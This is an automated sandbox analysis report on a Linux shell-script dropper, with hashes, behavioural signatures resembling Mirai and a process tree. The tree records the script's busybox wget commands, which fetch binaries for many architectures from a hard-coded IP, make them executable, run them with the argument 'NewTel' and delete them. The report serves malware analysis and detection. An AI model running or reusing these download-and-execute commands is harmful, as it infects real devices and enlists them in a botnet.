Analysis
-
max time kernel
149s -
max time network
150s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240729-en -
resource tags
-
submitted
23-11-2024 02:46
General
-
Target
a09cecfb202533bf5bcb0566dce4c9e9f8273d06a153613ba8f291dbc05f496b.sh
-
Size
1KB
-
MD5
476467eba539be5db3022f1ebde08841
-
SHA1
6fc462604c405f96b0823e2baa077f150b1bb33f
-
SHA256
a09cecfb202533bf5bcb0566dce4c9e9f8273d06a153613ba8f291dbc05f496b
-
SHA512
c6fe968567d3e60e8ecef1152c1a389c40245ce0b9a73880a2ff895443bc272000bf76b78c252c646a4a7f737a8564476740fa82792ca9847aa1071f28e47234
Malware Config
Signatures
-
Contacts a large (98107) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 12 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 12 IoCs
-
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
-
Renames itself 1 IoCs
-
Unexpected DNS network traffic destination 2 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
-
Enumerates active TCP sockets 1 TTPs 1 IoCs
Gets active TCP sockets from /proc virtual filesystem.
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Changes its process name 1 IoCs
-
Reads system network configuration 1 TTPs 1 IoCs
Uses contents of /proc filesystem to enumerate network settings.
-
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
-
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to tmp directory 12 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/a09cecfb202533bf5bcb0566dce4c9e9f8273d06a153613ba8f291dbc05f496b.sh/tmp/a09cecfb202533bf5bcb0566dce4c9e9f8273d06a153613ba8f291dbc05f496b.sh1⤵
-
/bin/busybox/bin/busybox wget http://45.125.66.203/jklarm -O jklarm2⤵
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox chmod +x jklarm2⤵
- File and Directory Permissions Modification
-
-
/tmp/jklarm./jklarm NewTel2⤵
- Executes dropped EXE
-
-
/bin/busybox/bin/busybox rm -rf jklarm2⤵
-
-
/bin/busybox/bin/busybox wget http://45.125.66.203/jklarm5 -O jklarm52⤵
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox chmod +x jklarm52⤵
- File and Directory Permissions Modification
-
-
/tmp/jklarm5./jklarm5 NewTel2⤵
- Executes dropped EXE
-
-
/bin/busybox/bin/busybox rm -rf jklarm52⤵
-
-
/bin/busybox/bin/busybox wget http://45.125.66.203/jklarm6 -O jklarm62⤵
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox chmod +x jklarm62⤵
- File and Directory Permissions Modification
-
-
/tmp/jklarm6./jklarm6 NewTel2⤵
- Executes dropped EXE
-
-
/bin/busybox/bin/busybox rm -rf jklarm62⤵
-
-
/bin/busybox/bin/busybox wget http://45.125.66.203/jklarm7 -O jklarm72⤵
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox chmod +x jklarm72⤵
- File and Directory Permissions Modification
-
-
/tmp/jklarm7./jklarm7 NewTel2⤵
- Executes dropped EXE
-
-
/bin/busybox/bin/busybox rm -rf jklarm72⤵
-
-
/bin/busybox/bin/busybox wget http://45.125.66.203/jklm68k -O jklm68k2⤵
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox chmod +x jklm68k2⤵
- File and Directory Permissions Modification
-
-
/tmp/jklm68k./jklm68k NewTel2⤵
- Executes dropped EXE
-
-
/bin/busybox/bin/busybox rm -rf jklm68k2⤵
-
-
/bin/busybox/bin/busybox wget http://45.125.66.203/jklmips -O jklmips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox chmod +x jklmips2⤵
- File and Directory Permissions Modification
-
-
/tmp/jklmips./jklmips NewTel2⤵
- Executes dropped EXE
- System Network Configuration Discovery
-
-
/bin/busybox/bin/busybox rm -rf jklmips2⤵
- System Network Configuration Discovery
-
-
/bin/busybox/bin/busybox wget http://45.125.66.203/jklmpsl -O jklmpsl2⤵
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox chmod +x jklmpsl2⤵
- File and Directory Permissions Modification
-
-
/tmp/jklmpsl./jklmpsl NewTel2⤵
- Executes dropped EXE
-
-
/bin/busybox/bin/busybox rm -rf jklmpsl2⤵
-
-
/bin/busybox/bin/busybox wget http://45.125.66.203/jklppc -O jklppc2⤵
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox chmod +x jklppc2⤵
- File and Directory Permissions Modification
-
-
/tmp/jklppc./jklppc NewTel2⤵
- Executes dropped EXE
-
-
/bin/busybox/bin/busybox rm -rf jklppc2⤵
-
-
/bin/busybox/bin/busybox wget http://45.125.66.203/jklsh4 -O jklsh42⤵
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox chmod +x jklsh42⤵
- File and Directory Permissions Modification
-
-
/tmp/jklsh4./jklsh4 NewTel2⤵
- Executes dropped EXE
-
-
/bin/busybox/bin/busybox rm -rf jklsh42⤵
-
-
/bin/busybox/bin/busybox wget http://45.125.66.203/jklspc -O jklspc2⤵
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox chmod +x jklspc2⤵
- File and Directory Permissions Modification
-
-
/tmp/jklspc./jklspc NewTel2⤵
- Executes dropped EXE
-
-
/bin/busybox/bin/busybox rm -rf jklspc2⤵
-
-
/bin/busybox/bin/busybox wget http://45.125.66.203/jklx86 -O jklx862⤵
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox chmod +x jklx862⤵
- File and Directory Permissions Modification
-
-
/tmp/jklx86./jklx86 NewTel2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Renames itself
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
-
-
/bin/busybox/bin/busybox rm -rf jklx862⤵
-
-
/bin/busybox/bin/busybox wget http://45.125.66.203/jklarc -O jklarc2⤵
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox chmod +x jklarc2⤵
- File and Directory Permissions Modification
-
-
/tmp/jklarc./jklarc NewTel2⤵
- Executes dropped EXE
-
-
/bin/sh/bin/sh ./jklarc NewTel2⤵
-
-
/bin/busybox/bin/busybox rm -rf jklarc2⤵
-
-
/bin/busybox/bin/busybox rm -rf wget.sh2⤵
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
21B
MD59e693458d3fdf80bb412b7694559ee76
SHA1b0dd364c99bf0ac7bebf7a966c568da97bd74bbd
SHA25608fd6f73820fcbd5332a0b705782e7eb19be4a65008ecabe95b9de4f4faa17fc
SHA5120a3bd653cfbbb194f3ec0b932e6d6af6c563e05fab76bb9b540fd35d1f5538ed784392ed3ae6a89c97101a0a09cd41295b3725e4a3a9f4bc2db8f57502b36527
-
Filesize
61KB
MD5ccc0e90e52316a5e000734aa3ab7ccdb
SHA138974e871dea717ef4d69f3f7644284a1b2a7110
SHA256e3ad3137e9ffc774a2916f5e329689397fc156318c21d5429089e24c3df6536a
SHA512247073ec1f9b19ff2349cc4f67b05e01fc7ce472aef06851ca272c756e439205631c7fe26112cc01db9149e83af550ea5666876bd9b06ca44255ecb4d35e5c1c
-
Filesize
61KB
MD55d2923d3bb5d7daf3c286d3de1c69842
SHA1c761cc78bd7c286b8a95701c8a6c215b0ed7a41f
SHA2564b36c1e443a9b1f76c30d9e4c240cf11ba7728ef0ffb83965fe31720e7c5633e
SHA512593fb52539469a132036265869082eda84b86f4c63937f74b37efa3023a4e8b5b47cdbdcabc13c1257714762c6c25a7305f743dee5ab8c8ef55d64a64f28cda2
-
Filesize
70KB
MD5bd890549b6469679c05204c8893564d9
SHA18e4655e1e4514fc49e19d914ce0e6d482dfe2d71
SHA256e5369f948a5f127f736149c3ba45bb65d0cc463d95bdda10ae4ba428484d43a2
SHA5128cad0724fd27828f29217ebf871975a429e5192427e24390de26d234352ca8d3b429969e27220bee03cd0376613e6e69e01471c5b88e1a074857bcec522ae5c4
-
Filesize
83KB
MD5b80f98bdc6f71e155d0e091e5ab5002d
SHA18b25aa2e46fafdc6e4e0e3c1bff2748f5e563f8f
SHA2569aa3f02c4310d7d9b86b90d875d3845e6b814eea8d524a6f728394caea489f3f
SHA5120a45cef1502c2280d74b376a5400a399f5fc504fa2a9ba65fb129b9c4929c165b27f6c9d038d97e91e72d1c7d31a76fd4e46b178a41dae000a6cf12f9971339c
-
Filesize
61KB
MD5415fcb79b0155ca5bb0ad3679a042ee8
SHA1d19937ba72dd1cbd7e78f2fe3cc802519d37e50f
SHA256f3911ea019b772760dd0aee45454a9054441478361bed4cfbbc3831eb6f5edf9
SHA512b3bfa62fbadd31206b3dbeac15dda3abf9eb113bbb74a5eb387e68d761f3ba350d3d5bbfee05a7c8d24092ce16ffa31a01799a7efc1bb771c8607c5d6abf566d
-
Filesize
78KB
MD50d28778c12ca8187d7c25a39cbf139b5
SHA1d6acf3d900bfa3cd334bbe4fb077aef271ef9b7b
SHA25688e10bb097ce1060c1f2798a3cd7d94eccde25e260d7ec8b08731f47d6c1b692
SHA5129ecdfd171809eee4b80289f341c1bf7a432b929e9eb5dd2659ff828ed0921476cfd79d6c0f475b04bf06d4fc55adb8bc6413a349b203ec5065e0182cac2134b9
-
Filesize
82KB
MD5cac710f2fa3123733fc72154a1017660
SHA1368534cb46325c7338ed84a70ce7938064385234
SHA2561d7789e5a8631a90c8de5d053928129ff900baa1052e4e1f3aaac13751ffef0f
SHA5127be9169cc87d3acc9a05d7ee0e93f9019f74c37e325d0c1f66925eb7a0a12fa4a36c22b4bb69533e68b5197f6431ae40c819778d423047bd651ddadbcd7f85f2
-
Filesize
60KB
MD5f9d899a6406e57e2d71b4efdcb905d14
SHA1ba89bac01e988337212f82a3748a2e78e7b6b433
SHA256fc1ccb3b24fe1ab63f367863c6f5c29096722a6ef4249ac7d6098855366edf0b
SHA5122a0b6aa14d7a77df42ed0e9ab8e3f9f8a4809a11214fe55a456fa8daaf7f5d5705e6cd8f027c6acb64c4e5134f1352464ae17cfe6453507f893cda77429b04dc
-
Filesize
54KB
MD555ec4127f02a2da58051392d8444fe43
SHA1ac171a19abf98ef9a508a71daa8c94919c508b6c
SHA256f7969c00f4f2a706dc5e5f0061c3b9dbfc14532fcfe475dee2371e9c2755fa43
SHA51207f98e2d027384e5e711674404920e2dcb3f405544736300c79b20ef569c748d39cf0d6cdd52a3934129586670edb8ad67f9c14a67e5e7784fc84efbda4ed65d
-
Filesize
64KB
MD56b1c85406a762b1c6e733fe3956912a8
SHA174d5c40b1a36d1bff9bb19f080dac1821de12e5e
SHA2566a3fe820e19bb46aec4937415ff98099d2b15f1e2a98649f3bf9bfe662a27994
SHA5127374ad3acdc9c0c3348668d563c0651144d1e83b6dde746c0e2224e8db4856166253bd26c5cbcb27993725f56b1dac714d9c5ce3f79c3a18d179ff87879106b9
-
Filesize
56KB
MD582934c42a0cf76b383943fbe49435fa5
SHA1063a3ae2bd12986a68c56b500267abd42fdd1134
SHA2561dd6c9bc4f5f44c480be2ee4841629ab0a15981617550bec5d9bf970d34819db
SHA5125e2c49c028b69fe06ec025b067538dbd35ac4027ac8e246ef1932db4fd430d1e9d3f1843846d377b02ac4a6203e1562da279ec4cfc21a6ab0a48669a97f209eb